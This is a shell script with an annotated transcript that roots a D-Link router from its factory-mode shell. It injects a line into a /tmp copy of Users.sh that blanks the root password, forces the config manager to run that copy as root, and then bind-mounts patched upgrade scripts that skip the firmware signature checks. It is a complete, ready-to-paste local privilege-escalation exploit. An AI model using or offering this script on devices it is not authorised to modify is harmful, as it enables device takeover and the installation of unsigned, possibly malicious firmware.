#!/bin/ash
#
# script to be executed on router to become root:
# enter factory mode with the following commands:
#
# ===== step 1 ======
#valerio@ubuntu-hp:~$ telnet 192.168.1.1
# Trying 192.168.1.1...
# Connected to 192.168.1.1.
# Escape character is '^]'.
# Login: admin
# Password:
# ********************************************
# * D-Link *
# * *
# * WARNING: Authorised Access Only *
# ********************************************
# Welcome
# DLINK# factory
# DLINK(factory)# factory-mode
# DLINK(factory)#
# DLINK(factory)# Connection closed by foreign host.
# ======== end of step 1
# the router reboots and restart in factory mode
# DHCP is disabled so you have to assign a static IP address
# to your PC to connect to the router using ethernet
# now login again and enter a linux shell with the
# "system shell" command
# ======== step 2 =============
# valerio@ubuntu-hp:~$ telnet 192.168.1.1
# Trying 192.168.1.1...
# Connected to 192.168.1.1.
# Escape character is '^]'.
# Login: admin
# Password:
# ********************************************
# * D-Link *
# * *
# * WARNING: Authorised Access Only *
# ********************************************
# Welcome
# DLINK# system shell
# BusyBox v1.17.3 (2018-04-11 12:29:54 CEST) built-in shell (ash)
# Enter 'help' for a list of built-in commands.
# /root $
# ======== end of step 2 ========
# now execute this script on the target copying it into the /tmp
# folder. You can use scp to copy this script from your Linux PC
# or you can do a simpler copy/paste to a file:
#
# ======== step 3 ===========
# /root $ cat > /tmp/hack-script.sh
# do a copy and paste of this script
# press CTRL-D to terminate the copy
#
# /root $ chmod a+x /tmp/hack-script.sh
# /root $ /tmp/hack-script.sh
# copy in /tmp and modify /etc/cm/tr181/dom/Management.xml
# replacing 'Users.sh' with '../../tmp/Users.sh'
# copy in /tmp and modify /etc/ah/Users.sh
# introducig the following line to enabl root without password:
# sed -i 's/^root:\*:0:0:root:/root::0:0:root:/'
# reconfiguring cm with the following command:
# cmclient DOM Device /tmp/Management.xml
# OK
# force excution of /tmp/Users.sh as root with the following command:
# cmclient ADD Device.Users.User
# 4
# Done, now you can become root with the following command:
# su -
# ======= end of step 3 ===========
#
# you can now become root as shown below
#
# ======= step 4
# /root $ su -
#
# BusyBox v1.17.3 (2018-04-11 12:29:54 CEST) built-in shell (ash)
# Enter 'help' for a list of built-in commands.
#
# ..................................................................
# root@localhost:~#
# ====== end of step 4
#
# --------- copy/paste from the line below --------------------------
#!/bin/ash
#
# Runs in the router's factory-mode BusyBox shell (see the transcript in the
# header). Every step below writes a modified copy of a system file under /tmp
# and then points the running system at that copy; no file under /etc or
# /usr is rewritten in place. There is no error checking anywhere: a failing
# cat/sed/cmclient/su does not stop the script, so a partial run leaves the
# device in an undefined mix of original and /tmp-backed files.
# NOTE(review): the sed escape sequences used here ("\n" inside a replacement,
# "\#", "\!" and "\^" escapes) rely on BusyBox/GNU sed behaviour; they are not
# portable POSIX sed and would need re-checking on any other sed.
#
# Step 1: make the config manager ("cm") reference /tmp/Users.sh instead of
# /etc/ah/Users.sh. The XML is copied to /tmp with every occurrence of
# "Users.sh" replaced by the relative path "../../tmp/Users.sh"; the original
# XML is left untouched.
echo "copy in /tmp and modify /etc/cm/tr181/dom/Management.xml"
echo "replacing 'Users.sh' with '../../tmp/Users.sh'"
cat /etc/cm/tr181/dom/Management.xml | \
sed 's/Users.sh/\.\.\/\.\.\/tmp\/Users.sh/g' > /tmp/Management.xml
# Step 2: build /tmp/Users.sh from /etc/ah/Users.sh. The sed matches the text
# "#!/bin/sh" wherever it occurs on a line and re-emits it followed by a new
# line, which after all escapes resolve reads:
#   sed -i "s/^root:\*:0:0:root:/root::0:0:root:/" /tmp/passwd
# i.e. the root entry of /tmp/passwd has its "*" (locked) password field
# emptied; per the echo below that is what makes "su -" succeed without a
# password. Escaping notes: "/" is the s/// delimiter so every literal slash is
# "\/", "\\\*" survives as "\*" in the output, "\^" as "^", and "\n" becomes
# the line break. If Users.sh does not contain "#!/bin/sh" nothing is inserted
# and the later steps do nothing useful — verify on the target.
# NOTE(review): /tmp/passwd is presumably the password file cm generates at
# runtime (it is not created by this script) — confirm.
echo "copy in /tmp and modify /etc/ah/Users.sh"
echo "introducig the following line to enabl root without password:"
echo " sed -i 's/^root:\*:0:0:root:/root::0:0:root:/'"
cat /etc/ah/Users.sh | \
sed 's/\#\!\/bin\/sh/\#\!\/bin\/sh\nsed -i "s\/\^root:\\\*:0:0:root:\/root::0:0:root:\/" \/tmp\/passwd/' \
> /tmp/Users.sh
# The redirect above creates the file without execute bits; cm must be able to
# run it.
chmod a+x /tmp/Users.sh
# Step 3: reload the Device data model from the modified XML so cm now resolves
# Users.sh to the /tmp copy (per the "reconfiguring cm" echo; the header
# transcript shows cmclient answering "OK").
echo "reconfiguring cm with the following command:"
echo "cmclient DOM Device /tmp/Management.xml"
cmclient DOM Device /tmp/Management.xml
# Step 4: adding a user object makes cm execute Users.sh — now /tmp/Users.sh,
# including the inserted sed — with root privileges (per the echo below; the
# header transcript shows cmclient printing "4"). From here on "su -" needs no
# password on this device; the header's step 4 shows the resulting root shell.
echo "force excution of /tmp/Users.sh as root with the following command:"
echo " cmclient ADD Device.Users.User"
cmclient ADD Device.Users.User
echo "Done, now you can become root with the following command:"
echo "su -"
# Step 5: neutralise the firmware-upgrade checks by bind-mounting patched
# copies over the real scripts. Both mounts live only until reboot (per the
# echo below) and are visible in the device's mount table while active, as are
# the patched copies under /tmp.
echo "enable, until reboot, upgrade with an unsigned firmware"
# "cp -p" first so the /tmp copy carries the original's mode bits; the
# redirect that follows truncates and rewrites the contents but keeps those
# bits. In upgrade.sh every "ret_code=$?" becomes "ret_code=0", so whatever
# check preceded that assignment is treated as having succeeded (presumably
# the firmware signature check, given the echo above — not visible here).
cp -p /usr/sbin/upgrade.sh /tmp/upgrade.sh
cat /usr/sbin/upgrade.sh | sed -r 's/ret_code\=\$\?/ret_code\=0/' > /tmp/upgrade.sh
# mount needs root; "su -" works without a password only if step 4 succeeded.
# Nothing checks that it did.
su -c "mount --bind /tmp/upgrade.sh /usr/sbin/upgrade.sh" -
# Same pattern for custom-upgrade-check.sh: every line beginning with
# "exit 12" is replaced by "$(printError "ignoring previous error")", so the
# script no longer aborts there. NOTE(review): printError is presumably a
# function defined inside that script; wrapping the call in "$( )" means its
# stdout is then executed as a command, which only works if it prints nothing
# — confirm on the target.
cp -p /usr/sbin/custom-upgrade-check.sh /tmp/custom-upgrade-check.sh
cat /usr/sbin/custom-upgrade-check.sh | sed 's/^exit 12/\$\(printError "ignoring previous error"\)/' > /tmp/custom-upgrade-check.sh
su -c "mount --bind /tmp/custom-upgrade-check.sh /usr/sbin/custom-upgrade-check.sh" -